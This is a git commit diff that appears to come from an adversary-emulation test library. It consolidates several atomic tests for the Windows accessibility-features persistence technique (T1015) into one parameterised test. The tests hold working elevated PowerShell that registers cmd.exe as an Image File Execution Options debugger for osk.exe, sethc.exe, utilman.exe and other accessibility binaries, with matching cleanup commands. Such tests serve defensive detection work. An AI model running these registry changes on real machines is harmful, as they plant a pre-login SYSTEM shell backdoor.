T1015 collapsed technique into one atomic with additional inputargs (#808)

* collapsed technique into one atomic * Update atomics/T1015/T1015.yaml Co-Authored-By: Keith McCammon <keith@mccammon.org> * Update atomics/T1015/T1015.yaml Co-Authored-By: Keith McCammon <keith@mccammon.org> * Update atomics/T1015/T1015.yaml Co-Authored-By: Keith McCammon <keith@mccammon.org> * T1015 removed reference to execution framework * Update description T1015.yaml Co-Authored-By: Keith McCammon <keith@mccammon.org> * Update dash over colon T1015.yaml Co-Authored-By: Keith McCammon <keith@mccammon.org> Co-authored-by: Keith McCammon <keith@mccammon.org>
2020-01-28 15:09:24 -06:00
parent 1141a86873
commit 06361de337
1 changed files with 28 additions and 206 deletions
@@ -3,222 +3,44 @@ attack_technique: T1015
 display_name: Accessibility Features

 atomic_tests:
- name: Attaches Command Prompt As Debugger To Process - osk
+- name: Attaches Command Prompt as a Debugger to a List of Target Processes
  description: |
    This allows adversaries to execute the attached process
+    Attaches cmd.exe to osk.exe by default. Other useful values to include in parent_list include: "sethc.exe", "utilman.exe", "magnify.exe", "narrator.exe", "DisplaySwitch.exe", "atbroker.exe".

  supported_platforms:
    - windows
  input_arguments:
-    target_executable:
-      description: File You Want To Attach cmd To
+    parent_list:
+      description: Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe"
      type: String
-      default: osk.exe
+      default: "osk.exe"
+    attached_process:
+      description: Full path to process to attach to target in #{parent_list}. Default: cmd.exe
+      type: Path
+      default: C:\windows\system32\cmd.exe

  executor:
    name: powershell
    elevation_required: true
    command: |
-      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
-      $Value = "C:\windows\system32\cmd.exe"
-      $Name = "Debugger"
-      IF(!(Test-Path $registryPath))
-       {
-        New-Item -Path $registryPath -Force
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-       }
-      ELSE
-       {
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value
-       }
+      $input_table = #{parent_list}
+      Foreach ($item in $input_table){   
+        $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
+        $Value = "#{attached_process}"
+        $Name = "Debugger"
+        IF(!(Test-Path $registryPath))
+        {
+          New-Item -Path $registryPath -Force
+          New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+        }
+        ELSE
+        {
+          New-ItemProperty -Path $registryPath -Name $name -Value $Value
+        }
+      }
    cleanup_command: |
-      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
-
-
- name: Attaches Command Prompt As Debugger To Process - sethc
-  description: |
-    This allows adversaries to execute the attached process
-
-  supported_platforms:
-    - windows
-  input_arguments:
-    target_executable:
-      description: File You Want To Attach cmd To
-      type: String
-      default: sethc.exe
-
-  executor:
-    name: powershell
-    elevation_required: true
-    command: |
-      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
-      $Value = "C:\windows\system32\cmd.exe"
-      $Name = "Debugger"
-      IF(!(Test-Path $registryPath))
-       {
-        New-Item -Path $registryPath -Force
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-       }
-      ELSE
-       {
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value
-       }
-    cleanup_command: |
-      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
-
- name: Attaches Command Prompt As Debugger To Process - utilman
-  description: |
-    This allows adversaries to execute the attached process
-
-  supported_platforms:
-    - windows
-  input_arguments:
-    target_executable:
-      description: File You Want To Attach cmd To
-      type: String
-      default: utilman.exe
-
-  executor:
-    name: powershell
-    elevation_required: true
-    command: |
-      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
-      $Value = "C:\windows\system32\cmd.exe"
-      $Name = "Debugger"
-      IF(!(Test-Path $registryPath))
-       {
-        New-Item -Path $registryPath -Force
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-       }
-      ELSE
-       {
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value
-       }
-    cleanup_command: |
-      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
-
- name: Attaches Command Prompt As Debugger To Process - magnify
-  description: |
-    This allows adversaries to execute the attached process
-
-  supported_platforms:
-    - windows
-  input_arguments:
-    target_executable:
-      description: File You Want To Attach cmd To
-      type: String
-      default: magnify.exe
-
-  executor:
-    name: powershell
-    elevation_required: true
-    command: |
-      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
-      $Value = "C:\windows\system32\cmd.exe"
-      $Name = "Debugger"
-      IF(!(Test-Path $registryPath))
-       {
-        New-Item -Path $registryPath -Force
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-       }
-      ELSE
-       {
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value
-       }
-    cleanup_command: |
-      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
-
- name: Attaches Command Prompt As Debugger To Process - narrator
-  description: |
-    This allows adversaries to execute the attached process
-
-  supported_platforms:
-    - windows
-  input_arguments:
-    target_executable:
-      description: File You Want To Attach cmd To
-      type: String
-      default: narrator.exe
-
-  executor:
-    name: powershell
-    elevation_required: true
-    command: |
-      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
-      $Value = "C:\windows\system32\cmd.exe"
-      $Name = "Debugger"
-      IF(!(Test-Path $registryPath))
-       {
-        New-Item -Path $registryPath -Force
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-       }
-      ELSE
-       {
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value
-       }
-    cleanup_command: |
-      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
-
-
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
-  description: |
-    This allows adversaries to execute the attached process
-
-  supported_platforms:
-    - windows
-  input_arguments:
-    target_executable:
-      description: File You Want To Attach cmd To
-      type: String
-      default: DisplaySwitch.exe
-
-  executor:
-    name: powershell
-    elevation_required: true
-    command: |
-      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
-      $Value = "C:\windows\system32\cmd.exe"
-      $Name = "Debugger"
-      IF(!(Test-Path $registryPath))
-       {
-        New-Item -Path $registryPath -Force
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-       }
-      ELSE
-       {
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value
-       }
-    cleanup_command: |
-      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
-
-
- name: Attaches Command Prompt As Debugger To Process - AtBroker
-  description: |
-    This allows adversaries to execute the attached process
-
-  supported_platforms:
-    - windows
-  input_arguments:
-    target_executable:
-      description: File You Want To Attach cmd To
-      type: String
-      default: atbroker.exe
-
-  executor:
-    name: powershell
-    elevation_required: true
-    command: |
-      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
-      $Value = "C:\windows\system32\cmd.exe"
-      $Name = "Debugger"
-      IF(!(Test-Path $registryPath))
-       {
-        New-Item -Path $registryPath -Force | Out-Null
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-       }
-      ELSE
-       {
-        New-ItemProperty -Path $registryPath -Name $name -Value $Value
-       }
-    cleanup_command: |
-      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
+      $input_table = #{parent_list}  
+      Foreach ($item in $input_table){
+        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
+      }